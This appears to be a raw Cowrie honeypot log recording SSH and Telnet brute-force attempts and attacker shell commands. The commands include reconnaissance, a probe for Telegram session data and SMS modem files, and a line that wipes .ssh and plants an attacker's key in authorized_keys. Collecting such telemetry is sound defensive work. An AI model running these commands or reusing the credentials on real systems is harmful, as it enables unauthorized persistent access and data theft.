{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:36.775114Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:37.527216Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T22:47:37.527912Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:37.869526Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:38.568650Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-26T22:47:38.569363Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:38.919255Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:39.701865Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-26T22:47:39.702613Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:40.044692Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:40.807335Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-26T22:47:40.808139Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:41.150734Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:41.853389Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-26T22:47:41.854203Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:42.199237Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:47:42.992295Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-26T22:47:42.993181Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":15045,"dst_ip":"1.2.3.4","dst_port":22,"session":"b341491bf533","protocol":"ssh","message":"New connection: 80.94.95.112:15045 (1.2.3.4:22) [session: b341491bf533]","sensor":"my-vps","timestamp":"2025-08-26T22:47:43.488371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:47:43.492422Z","src_ip":"80.94.95.112","session":"b341491bf533"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:47:43.521822Z","src_ip":"80.94.95.112","session":"b341491bf533"}
{"eventid":"cowrie.login.failed","username":"admin","password":"mummy","message":"login attempt [admin/mummy] failed","sensor":"my-vps","timestamp":"2025-08-26T22:47:43.735867Z","src_ip":"80.94.95.112","session":"b341491bf533"}
{"eventid":"cowrie.login.failed","username":"admin","password":"mowgli","message":"login attempt [admin/mowgli] failed","sensor":"my-vps","timestamp":"2025-08-26T22:47:44.769688Z","src_ip":"80.94.95.112","session":"b341491bf533"}
{"eventid":"cowrie.login.failed","username":"admin","password":"movers","message":"login attempt [admin/movers] failed","sensor":"my-vps","timestamp":"2025-08-26T22:47:45.802332Z","src_ip":"80.94.95.112","session":"b341491bf533"}
{"eventid":"cowrie.login.failed","username":"admin","password":"monkeyma","message":"login attempt [admin/monkeyma] failed","sensor":"my-vps","timestamp":"2025-08-26T22:47:46.835681Z","src_ip":"80.94.95.112","session":"b341491bf533"}
{"eventid":"cowrie.login.failed","username":"admin","password":"momsanaladventure","message":"login attempt [admin/momsanaladventure] failed","sensor":"my-vps","timestamp":"2025-08-26T22:47:47.869253Z","src_ip":"80.94.95.112","session":"b341491bf533"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:48.902006Z","src_ip":"80.94.95.112","session":"b341491bf533"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63998,"dst_ip":"1.2.3.4","dst_port":23,"session":"56ae11d52987","protocol":"telnet","message":"New connection: 212.227.125.160:63998 (1.2.3.4:23) [session: 56ae11d52987]","sensor":"my-vps","timestamp":"2025-08-26T22:47:52.476376Z"}
{"eventid":"cowrie.login.failed","username":"austinpowers","password":"dr3vil1999","message":"login attempt [austinpowers/dr3vil1999] failed","sensor":"my-vps","timestamp":"2025-08-26T22:47:57.329975Z","src_ip":"212.227.125.160","session":"56ae11d52987"}
{"eventid":"cowrie.session.closed","duration":6.064246892929077,"message":"Connection lost after 6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:47:58.540557Z","src_ip":"212.227.125.160","session":"56ae11d52987"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40818,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d9a79dd3f90","protocol":"telnet","message":"New connection: 212.227.125.160:40818 (1.2.3.4:23) [session: 8d9a79dd3f90]","sensor":"my-vps","timestamp":"2025-08-26T22:47:58.616930Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:48:01.626879Z","src_ip":"212.227.125.160","session":"8d9a79dd3f90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:48:01.656114Z","src_ip":"212.227.125.160","session":"8d9a79dd3f90"}
{"eventid":"cowrie.command.input","input":"echo ECHO_TEST_1756248483615519374","message":"CMD: echo ECHO_TEST_1756248483615519374","sensor":"my-vps","timestamp":"2025-08-26T22:48:03.780180Z","src_ip":"212.227.125.160","session":"8d9a79dd3f90"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b00ee6eec3817ae6e0400b4ab7dbc1742bacd0eb50798f88476fc4fb7fcdbd2a","size":526,"shasum":"b00ee6eec3817ae6e0400b4ab7dbc1742bacd0eb50798f88476fc4fb7fcdbd2a","duplicate":false,"duration":"3.6","message":"Closing TTY Log: var/lib/cowrie/tty/b00ee6eec3817ae6e0400b4ab7dbc1742bacd0eb50798f88476fc4fb7fcdbd2a after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:48:05.265361Z","src_ip":"212.227.125.160","session":"8d9a79dd3f90"}
{"eventid":"cowrie.session.closed","duration":6.65415358543396,"message":"Connection lost after 6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:48:05.270987Z","src_ip":"212.227.125.160","session":"8d9a79dd3f90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38518,"dst_ip":"1.2.3.4","dst_port":22,"session":"99875792cc45","protocol":"ssh","message":"New connection: 212.227.235.229:38518 (1.2.3.4:22) [session: 99875792cc45]","sensor":"my-vps","timestamp":"2025-08-26T22:48:39.874784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:48:40.601156Z","src_ip":"212.227.235.229","session":"99875792cc45"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:48:40.602097Z","src_ip":"212.227.235.229","session":"99875792cc45"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo","message":"login attempt [odoo/odoo] failed","sensor":"my-vps","timestamp":"2025-08-26T22:48:44.061132Z","src_ip":"212.227.235.229","session":"99875792cc45"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:48:45.996663Z","src_ip":"212.227.235.229","session":"99875792cc45"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":41490,"dst_ip":"1.2.3.4","dst_port":22,"session":"e57f9e62479f","protocol":"ssh","message":"New connection: 106.12.128.104:41490 (1.2.3.4:22) [session: e57f9e62479f]","sensor":"my-vps","timestamp":"2025-08-26T22:48:56.646349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:48:56.647388Z","src_ip":"106.12.128.104","session":"e57f9e62479f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:48:59.444886Z","src_ip":"106.12.128.104","session":"e57f9e62479f"}
{"eventid":"cowrie.login.failed","username":"mo","password":"123456","message":"login attempt [mo/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:49:03.285453Z","src_ip":"106.12.128.104","session":"e57f9e62479f"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:49:04.496643Z","src_ip":"106.12.128.104","session":"e57f9e62479f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55568,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad70ddf8ed38","protocol":"ssh","message":"New connection: 212.227.235.229:55568 (1.2.3.4:22) [session: ad70ddf8ed38]","sensor":"my-vps","timestamp":"2025-08-26T22:49:09.526577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:49:09.527966Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:49:09.778851Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.login.success","username":"root","password":"314159","message":"login attempt [root/314159] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:49:10.801380Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:49:11.420985Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T22:49:11.421709Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T22:49:11.423326Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:49:11.677883Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:49:12.268575Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T22:49:12.269477Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T22:49:12.526344Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:49:12.527406Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37654,"dst_ip":"1.2.3.4","dst_port":22,"session":"481f68bcec23","protocol":"ssh","message":"New connection: 212.227.235.229:37654 (1.2.3.4:22) [session: 481f68bcec23]","sensor":"my-vps","timestamp":"2025-08-26T22:49:12.785677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:49:12.786459Z","src_ip":"212.227.235.229","session":"481f68bcec23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:49:13.064068Z","src_ip":"212.227.235.229","session":"481f68bcec23"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T22:49:14.126174Z","src_ip":"212.227.235.229","session":"481f68bcec23"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:49:15.393069Z","src_ip":"212.227.235.229","session":"481f68bcec23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37662,"dst_ip":"1.2.3.4","dst_port":22,"session":"236fc0938844","protocol":"ssh","message":"New connection: 212.227.235.229:37662 (1.2.3.4:22) [session: 236fc0938844]","sensor":"my-vps","timestamp":"2025-08-26T22:49:15.705816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:49:15.708827Z","src_ip":"212.227.235.229","session":"236fc0938844"}
